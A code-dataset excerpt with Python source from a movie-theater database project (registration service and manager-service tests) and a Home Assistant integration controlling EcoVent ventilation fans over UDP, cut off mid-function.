metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "49ers-DB/Atlanta-Movie",
"score": 3
} |
#### File: app/services/RegisterService.py
```python
from app.services.DBService import get_conn
class RegisterService(object):
def registerUser(self, user) -> bool:
username = user['username']
firstname = user['firstname']
lastname = user['lastname']
password = user['password']
connection = get_conn()
with connection.cursor() as cursor:
#Checking for duplicates
sql = "SELECT `username` FROM `User` where username=(%s)"
cursor.execute(sql, (username))
userDatas = cursor.fetchall()
connection.commit()
success = False
if len(userDatas) < 1:
#Inserting the values to User
sql = """INSERT INTO User (username, status, firstname, lastname, password)
VALUES (%s,%s,%s,%s,MD5(%s))"""
dataTuple = (username, 'Pending', firstname, lastname, password)
cursor.execute(sql, dataTuple)
connection.commit()
success = True
connection.close()
return success
def registerCustomer(self, customer) -> bool:
response = ({'message': 'Credit Card taken'}, 402)
connection = get_conn()
with connection.cursor() as cursor:
credit_card_list = customer['creditCardsList']
if len(credit_card_list) > 5:
return ({'message': 'Too Many Credit Cards'}, 402)
for i in range(5 - len(credit_card_list)):
credit_card_list.append(None)
credit_card_list = tuple(credit_card_list)
sql = """SELECT count(`creditCardNum`) FROM `CustomerCreditCard`
where creditCardNum in (%s, %s, %s, %s, %s)"""
cursor.execute(sql, credit_card_list)
dup_count = cursor.fetchall()
connection.commit()
if dup_count[0].get(('count(`creditCardNum`)')) > 0:
return ({'message': 'Credit Card taken'}, 402)
response = ({'message': 'Username Taken'}, 402)
if self.registerUser(customer):
#Inserting the values to Customer
sql = """INSERT INTO Customer (username)
VALUES (%s)"""
dataTuple = (customer['username'])
cursor.execute(sql, dataTuple)
connection.commit()
#Inserting the values to CustomerCreditCard
creditCards = customer['creditCardsList']
for creditCard in creditCards:
if(creditCard != None):
sql = """INSERT INTO CustomerCreditCard (username, creditCardNum)
VALUES (%s, %s)"""
dataTuple = (customer['username'], creditCard)
cursor.execute(sql, dataTuple)
connection.commit()
response = ({'ok': True, 'data': customer}, 200)
connection.close()
return response
def registerManager(self, manager) -> bool:
connection = get_conn()
with connection.cursor() as cursor:
if manager['selectedState']['value'] == "ALL":
return ({'message':'State Cannot be ALL'}, 400)
address = (manager['address'], manager['city'], manager['selectedState']['value'], manager['zipCode'])
sql = "SELECT `username` FROM `Manager` WHERE manStreet=(%s) AND manCity=(%s) AND manState=(%s) AND manZipCode=(%s)"
cursor.execute(sql, address)
userDatas = cursor.fetchall()
connection.commit()
if len(userDatas) < 1:
response = ({'message':'Username already taken'}, 400)
if self.registerUser(manager):
#Inserting the values to Employee
sql = """INSERT INTO Employee (username)
VALUES (%s)"""
dataTuple = (manager['username'])
cursor.execute(sql, dataTuple)
connection.commit()
#Inserting the values to Manager
sql = """INSERT INTO Manager (username, manStreet, manCity, manState, manZipCode, comName)
VALUES (%s, %s, %s, %s, %s, %s)"""
dataTuple = (manager['username'], manager['address'], manager['city'], manager['selectedState']['value'], manager['zipCode'], manager['selectedCompany']['value'])
cursor.execute(sql, dataTuple)
connection.commit()
response = ({'ok': True, 'data': manager}, 200)
else:
response = ({'message':'Address already taken'}, 400)
connection.close()
return response
def registerManagerCustomer(self, managerCustomer) -> bool:
connection = get_conn()
with connection.cursor() as cursor:
if managerCustomer['selectedState']['value'] == "ALL":
return ({'message':'State Cannot be ALL'}, 400)
address = (managerCustomer['address'], managerCustomer['city'], managerCustomer['selectedState']['value'], managerCustomer['zipCode'])
sql = "SELECT `username` FROM `Manager` WHERE manStreet=(%s) AND manCity=(%s) AND manState=(%s) AND manZipCode=(%s)"
cursor.execute(sql, address)
userDatas = cursor.fetchall()
connection.commit()
if len(userDatas) < 1 :
response = ({'message':'Username already taken'}, 400)
if self.registerCustomer(managerCustomer)[1] == 200:
#Inserting the values to Employee
sql = """INSERT INTO Employee (username)
VALUES (%s)"""
dataTuple = (managerCustomer['username'])
cursor.execute(sql, dataTuple)
connection.commit()
#Inserting the values to Manager
sql = """INSERT INTO Manager (username, manStreet, manCity, manState, manZipCode, comName)
VALUES (%s, %s, %s, %s, %s, %s)"""
dataTuple = (managerCustomer['username'], managerCustomer['address'], managerCustomer['city'], managerCustomer['selectedState']['value'], managerCustomer['zipCode'], managerCustomer['selectedCompany']['value'])
cursor.execute(sql, dataTuple)
connection.commit()
response = ({'ok': True, 'data': managerCustomer}, 200)
else:
response = ({'message':'Address already taken'}, 400)
connection.close()
return response
```
#### File: Atlanta-Movie/test/test_ManagerService.py
```python
import pytest
import functools
import datetime
import pymysql
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from app.services.DBService import get_conn
from app.services.ManagerService import ManagerService
class TestManagerService(object):
def test_TheaterOverview_NoFilters(self):
TOTestDict = {}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"Ge<NAME>'s Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':datetime.date(2019,10,12),'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':datetime.date(2018,7,19),'Duration':75},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_MinReleaseDate(self):
TOTestDict = {'i_minReleaseDate':datetime.date(2010,11,26)}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
expected =[
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':datetime.date(2019,10,12),'Duration':130}]
print(Actual)
assert len(expected) == len(Actual)
assert sorted(expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_ReleaseDate(self):
TOTestDict = {'i_minReleaseDate':datetime.date(1985,8,13),
'i_maxReleaseDate':datetime.date(2010,11,26)
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':datetime.date(2018,7,19),'Duration':75},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_PlayDate(self):
TOTestDict = {'i_minPlayDate':datetime.date(2019,3, 19),
'i_maxPlayDate':datetime.date(2019, 11, 12)
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"<NAME>'s Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':datetime.date(2019,10,12),'Duration':130}
]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
TOTestDict = {'i_minPlayDate':datetime.date(2019,3, 19),
'i_maxPlayDate':datetime.date(2019, 3, 19)
}
Actual = manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_maxDurFilter(self):
TOTestDict = {
"i_maxDuration": 100
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"<NAME> Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':datetime.date(2018,7,19),'Duration':75},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}
]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_durFilters(self):
TOTestDict = {
"i_maxDuration": 100,
"i_minDuration": 96
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"<NAME> Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}
]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_include_false(self):
TOTestDict = {
"i_notplayed": False
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"Ge<NAME>'s Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':datetime.date(2019,10,12),'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':datetime.date(2018,7,19),'Duration':75},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_include_True(self):
TOTestDict = {
"i_notplayed": True
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected = [
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"<NAME>'s Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_Schedule_Movie(self):
filterz = {'i_movName':'Spaceballs','i_movReleaseDate':datetime.date(1987,6,24),'i_movPlayDate':datetime.date(2030,6,24)}
connection = get_conn()
with connection.cursor() as cursor:
sql_del = """delete From MoviePlay where movPlayDate = '2030-06-24'"""
cursor.execute(sql_del)
connection.commit()
manager_service = ManagerService()
manager_service.ScheduleMovie('imbatman',filterz)
cursor.execute("select * from MoviePlay where movPlayDate = '2030-06-24'")
data=cursor.fetchall()
connection.commit()
sql_del = """delete From MoviePlay where movPlayDate = '2030-06-24'"""
cursor.execute(sql_del)
connection.commit()
connection.close()
assert len(data)==1
def compare_movie(item1, item2):
if item1['Movie'] < item2['Movie']:
return -1
elif item1['Movie'] > item2['Movie']:
return 1
else:
return compare_play_date(item1, item2)
def compare_play_date(item1, item2):
if item1['Play_Date'] is None and item2['Play_Date'] is None:
return 0
elif item1['Play_Date'] is None:
return 1
elif item2['Play_Date'] is None:
return -1
if item1['Play_Date'] < item2['Play_Date']:
return -1
elif item1['Play_Date'] > item2['Play_Date']:
return 1
else:
return 0
``` |
{
"source": "49jan/hass-ecovent",
"score": 2
} |
#### File: custom_components/ecovent/fan.py
```python
from __future__ import annotations
import asyncio
from email.policy import default
import logging
import ipaddress
import time
from datetime import timedelta
import voluptuous as vol
from homeassistant.components.fan import (
ATTR_PERCENTAGE,
ENTITY_ID_FORMAT,
PLATFORM_SCHEMA,
FanEntity,
FanEntityFeature,
)
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_ENTITY_ID,
CONF_IP_ADDRESS,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
)
from homeassistant.core import callback
from homeassistant.helpers import config_validation as cv, entity_platform
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import async_generate_entity_id
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.event import async_track_state_change_event
from .const import (
MY_DOMAIN,
CONF_DEFAULT_DEVICE_ID,
CONF_DEFAULT_NAME,
CONF_DEFAULT_PASSWORD,
CONF_DEFAULT_PORT,
ATTR_AIRFLOW,
ATTR_AIRFLOW_MODES,
ATTR_FILTER_REPLACEMENT_STATUS,
ATTR_FILTER_TIMER_COUNTDOWN,
ATTR_HUMIDITY,
ATTR_HUMIDITY_SENSOR_STATUS,
ATTR_HUMIDITY_SENSOR_TRESHOLD,
ATTR_MACHINE_HOURS,
PRESET_MODE_ON,
SERVICE_CLEAR_FILTER_REMINDER,
SERVICE_SET_AIRFLOW,
SERVICE_HUMIDITY_SENSOR_TURN_ON,
SERVICE_HUMIDITY_SENSOR_TURN_OFF,
SERVICE_SET_HUMIDITY_SENSOR_TRESHOLD_PERCENTAGE,
)
LOG = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME, default=CONF_DEFAULT_NAME): cv.string,
vol.Optional(CONF_DEVICE_ID, default=CONF_DEFAULT_DEVICE_ID): cv.string,
vol.Required(CONF_IP_ADDRESS): vol.All(ipaddress.ip_address, cv.string),
vol.Optional(CONF_PORT, default=CONF_DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default=CONF_DEFAULT_PASSWORD): cv.string,
}
)
# pylint: disable=unused-argument
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Initialize the EcoVent fans from config."""
name = config.get(CONF_NAME)
device_id = config.get(CONF_DEVICE_ID)
device_ip_address = config.get(CONF_IP_ADDRESS)
device_port = config.get(CONF_PORT)
device_pass = config.get(CONF_PASSWORD)
fan = EcoVentFan(
hass, config, device_ip_address, device_pass, device_id, name, device_port
)
async_add_entities([fan], update_before_add=True)
# expose service call APIs
# component = EntityComponent(LOG, MY_DOMAIN, hass)
component = entity_platform.async_get_current_platform()
component.async_register_entity_service(
SERVICE_SET_AIRFLOW,
{vol.Required(ATTR_AIRFLOW): cv.string},
"async_set_airflow",
)
component.async_register_entity_service(
SERVICE_HUMIDITY_SENSOR_TURN_ON,
{},
"async_humidity_sensor_turn_on",
)
component.async_register_entity_service(
SERVICE_HUMIDITY_SENSOR_TURN_OFF,
{},
"async_humidity_sensor_turn_off",
)
component.async_register_entity_service(
SERVICE_SET_HUMIDITY_SENSOR_TRESHOLD_PERCENTAGE,
{
vol.Required(ATTR_PERCENTAGE): vol.All(
vol.Coerce(int), vol.Range(min=0, max=100)
)
},
"async_set_humidity_sensor_treshold_percentage",
)
component.async_register_entity_service(
SERVICE_CLEAR_FILTER_REMINDER, {}, "async_clear_filter_reminder"
)
return True
"""Library to handle communication with Wifi ecofan from TwinFresh / Blauberg"""
import socket
import sys
import time
import math
from typing import Any
class EcoVentFan(FanEntity):
"""Class to communicate with the ecofan"""
HEADER = f"FDFD"
func = {
"read": "01",
"write": "02",
"write_return": "03",
"inc": "04",
"dec": "05",
"resp": "06",
}
states = {0: "off", 1: "on", 2: "togle"}
speeds = {
0: "standby",
1: "low",
2: "medium",
3: "high",
0xFF: "manual",
}
timer_modes = {0: "off", 1: "night", 2: "party"}
statuses = {0: "off", 1: "on"}
airflows = {0: "ventilation", 1: "heat_recovery", 2: "air_supply"}
alarms = {0: "no", 1: "alarm", 2: "warning"}
days_of_week = {
0: "all days",
1: "Monday",
2: "Tuesday",
3: "Wednesday",
4: "Thursday",
5: "Friday",
6: "Saturday",
7: "Sunday",
8: "Mon-Fri",
9: "Sat-Sun",
}
filters = {0: "filter replacement not required", 1: "replace filter"}
unit_types = {
0x0300: "Vento Expert A50-1/A85-1/A100-1 W V.2",
0x0400: "Vento Expert Duo A30-1 W V.2",
0x0500: "Vento Expert A30 W V.2",
}
wifi_operation_modes = {1: "client", 2: "ap"}
wifi_enc_types = {48: "Open", 50: "wpa-psk", 51: "wpa2_psk", 52: "wpa_wpa2_psk"}
wifi_dhcps = {0: "STATIC", 1: "DHCP", 2: "Invert"}
params = {
0x0001: ["state", states],
0x0002: ["speed", speeds],
0x0006: ["boost_status", statuses],
0x0007: ["timer_mode", timer_modes],
0x000B: ["timer_counter", None],
0x000F: ["humidity_sensor_state", states],
0x0014: ["relay_sensor_state", states],
0x0016: ["analogV_sensor_state", states],
0x0019: ["humidity_treshold", None],
0x0024: ["battery_voltage", None],
0x0025: ["humidity", None],
0x002D: ["analogV", None],
0x0032: ["relay_status", statuses],
0x0044: ["man_speed", None],
0x004A: ["fan1_speed", None],
0x004B: ["fan2_speed", None],
0x0064: ["filter_timer_countdown", None],
0x0066: ["boost_time", None],
0x006F: ["rtc_time", None],
0x0070: ["rtc_date", None],
0x0072: ["weekly_schedule_state", states],
0x0077: ["weekly_schedule_setup", None],
0x007C: ["device_search", None],
0x007D: ["device_password", None],
0x007E: ["machine_hours", None],
0x0083: ["alarm_status", alarms],
0x0085: ["cloud_server_state", states],
0x0086: ["firmware", None],
0x0088: ["filter_replacement_status", statuses],
0x0094: ["wifi_operation_mode", wifi_operation_modes],
0x0095: ["wifi_name", None],
0x0096: ["wifi_pasword", None],
0x0099: ["wifi_enc_type", wifi_enc_types],
0x009A: ["wifi_freq_chnnel", None],
0x009B: ["wifi_dhcp", wifi_dhcps],
0x009C: ["wifi_assigned_ip", None],
0x009D: ["wifi_assigned_netmask", None],
0x009E: ["wifi_main_gateway", None],
0x00A3: ["curent_wifi_ip", None],
0x00B7: ["airflow", airflows],
0x00B8: ["analogV_treshold", None],
0x00B9: ["unit_type", unit_types],
0x0302: ["night_mode_timer", None],
0x0303: ["party_mode_timer", None],
0x0304: ["humidity_status", statuses],
0x0305: ["analogV_status", statuses],
}
write_only_params = {
0x0065: ["filter_timer_reset", None],
0x0077: ["weekly_schedule_setup", None],
0x0080: ["reset_alarms", None],
0x0087: ["factory_reset", None],
0x00A0: ["wifi_apply_and_quit", None],
0x00A2: ["wifi_discard_and_quit", None],
}
# ========================== HA implementation ==========================
def __init__(
self,
hass,
conf,
host,
password="<PASSWORD>",
fan_id="DEFAULT_DEVICEID",
name="ecofanv2",
port=4000,
):
self.hass = hass
self._name = name
self._host = host
self._port = port
self._type = "02"
self._id = fan_id
self._pwd_size = 0
self._password = password
# HA attribute
self._attr_preset_modes = [PRESET_MODE_ON]
if fan_id == "DEFAULT_DEVICEID":
self.get_param("device_search")
self._id = self.device_search
# Set HA unique_id
self._attr_unique_id = self._id
self.update()
LOG.info(f"Created EcoVent fan controller '{self._host}'")
async def async_added_to_hass(self) -> None:
"""Once entity has been added to HASS, subscribe to state changes."""
await super().async_added_to_hass()
# setup listeners to track changes
async_track_state_change_event(
self.hass,
[
self.state,
self.speed,
self.humidity,
self.airflow,
self.filter_replacement_status,
],
self._state_changed,
)
@callback
def _state_changed(self, event):
"""Whenever state, speed, humidity or airflow change state, the fan speed needs to be updated"""
entity = event.data.get("entity_id")
to_state = event.data["new_state"].state
## sometimes there is no from_state
old_state = event.data.get("old_state")
from_state = old_state.state if old_state else None
if not from_state or to_state != from_state:
LOG.info(
f"{entity} changed from {from_state} to {to_state}, updating '{self._name}'"
)
self.schedule_update_ha_state()
# pylint: disable=arguments-differ
async def async_turn_on(
self,
percentage: int | None = None,
preset_mode: str | None = None,
**kwargs,
) -> None:
"""Turn on the fan."""
if self.state == "off":
if percentage is not None:
if percentage < 2:
percentage = 33 # Set to LOW
await self.async_set_percentage(percentage)
if preset_mode is None:
await self.async_set_preset_mode(PRESET_MODE_ON) # Set to defalut
else:
await self.async_set_preset_mode(preset_mode)
self.turn_on_ventilation()
def turn_on(
self,
percentage: int | None = None,
preset_mode: str | None = None,
**kwargs,
) -> None:
"""Turn on the fan."""
self.async_turn_on(percentage, preset_mode, **kwargs)
async def async_turn_off(self):
"""Turn the entity off."""
if self.state == "on":
self.turn_off_ventilation()
# override orignial entity method
def turn_off(self, **kwargs: Any) -> None:
"""Turn the entity off."""
self.async_turn_off()
def set_preset_mode(self, preset_mode: str) -> None:
LOG.info(f"Set async_set_preset_mode to: {preset_mode}")
self._attr_preset_mode = preset_mode
if preset_mode == PRESET_MODE_ON:
self.turn_on_ventilation()
else:
self.turn_off()
async def async_set_percentage(self, percentage: int) -> None:
LOG.info(f"async_set_percentage: {percentage}")
"""Set the speed of the fan, as a percentage."""
if percentage < 2:
await self.async_turn_off()
else:
self.set_man_speed_percent(percentage)
self.turn_on_ventilation()
async def async_set_airflow(self, airflow: str):
"""Set the airflow of the fan."""
self._airflow = airflow
self.set_airflow(await self.get_airflow_number_by_name(airflow))
async def get_airflow_number_by_name(self, airflow: str):
return list(self.airflows.values()).index(airflow)
async def async_humidity_sensor_turn_on(self):
request = "000F"
value = "01"
if self.humidity_sensor_state == "off":
self.do_func(self.func["write_return"], request, value)
async def async_humidity_sensor_turn_off(self):
request = "000F"
value = "00"
if self.humidity_sensor_state == "on":
self.do_func(self.func["write_return"], request, value)
async def async_set_humidity_sensor_treshold_percentage(self, percentage: int):
if percentage >= 40 and percentage <= 80:
request = "0019"
value = hex(percentage).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
# DO WE NEED IT? self.humidity_treshold = percentage
async def async_clear_filter_reminder(self):
# !!!! NOT TESTED YET !!!!!
if self.filter_replacement_status == "on":
request = "0065"
self.do_func(self.func["write"], request)
async def async_set_direction(self, direction: str):
"""Set the direction of the fan."""
raise NotImplementedError(f"Use {SERVICE_SET_AIRFLOW} service.")
async def async_oscillate(self, oscillating: bool):
"""Oscillate the fan."""
raise NotImplementedError(f"The fan does not support oscillations.")
@property
def extra_state_attributes(self):
"""Return optional state attributes."""
data: dict[str, float | str | None] = self.state_attributes
data[ATTR_AIRFLOW_MODES] = self.airflows
data["device_id"] = self.id
data[ATTR_AIRFLOW] = self.airflow
data[ATTR_HUMIDITY] = self.humidity
data[ATTR_HUMIDITY_SENSOR_STATUS] = self.humidity_status
data[ATTR_HUMIDITY_SENSOR_TRESHOLD] = self.humidity_treshold
# data["night_mode_timer"] = self.night_mode_timer
data[ATTR_FILTER_REPLACEMENT_STATUS] = self.filter_replacement_status
data[ATTR_FILTER_TIMER_COUNTDOWN] = self.filter_timer_countdown
data[ATTR_MACHINE_HOURS] = self.machine_hours
return data
@property
def supported_features(self) -> int:
return FanEntityFeature.SET_SPEED | FanEntityFeature.PRESET_MODE
# ========================== HA implementation ==========================
def connect(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.settimeout(4)
self.socket.connect((self._host, self._port))
return self.socket
def str2hex(self, str_msg):
return "".join("{:02x}".format(ord(c)) for c in str_msg)
def hex2str(self, hex_msg):
return "".join(
chr(int("0x" + hex_msg[i : (i + 2)], 16)) for i in range(0, len(hex_msg), 2)
)
def hexstr2tuple(self, hex_msg):
return [int(hex_msg[i : (i + 2)], 16) for i in range(0, len(hex_msg), 2)]
def chksum(self, hex_msg):
checksum = hex(sum(self.hexstr2tuple(hex_msg))).replace("0x", "").zfill(4)
byte_array = bytearray.fromhex(checksum)
chksum = hex(byte_array[1]).replace("0x", "").zfill(2) + hex(
byte_array[0]
).replace("0x", "").zfill(2)
return f"{chksum}"
def get_size(self, str):
return hex(len(str)).replace("0x", "").zfill(2)
def get_header(self):
id_size = self.get_size(self._id)
pwd_size = self.get_size(self._password)
id = self.str2hex(self._id)
password = self.str2hex(self._password)
str = f"{self._type}{id_size}{id}{pwd_size}{password}"
return str
def get_params_index(self, value):
for i in self.params:
if self.params[i][0] == value:
return i
def get_write_only_params_index(self, value):
for i in self.write_only_params:
if self.write_only_params[i][0] == value:
return i
def get_params_values(self, idx, value):
index = self.get_params_index(idx)
if index != None:
if self.params[index][1] != None:
for i in self.params[index][1]:
if self.params[index][1][i] == value:
return [index, i]
return [index, None]
else:
return [None, None]
def send(self, data):
self.socket = self.connect()
payload = self.get_header() + data
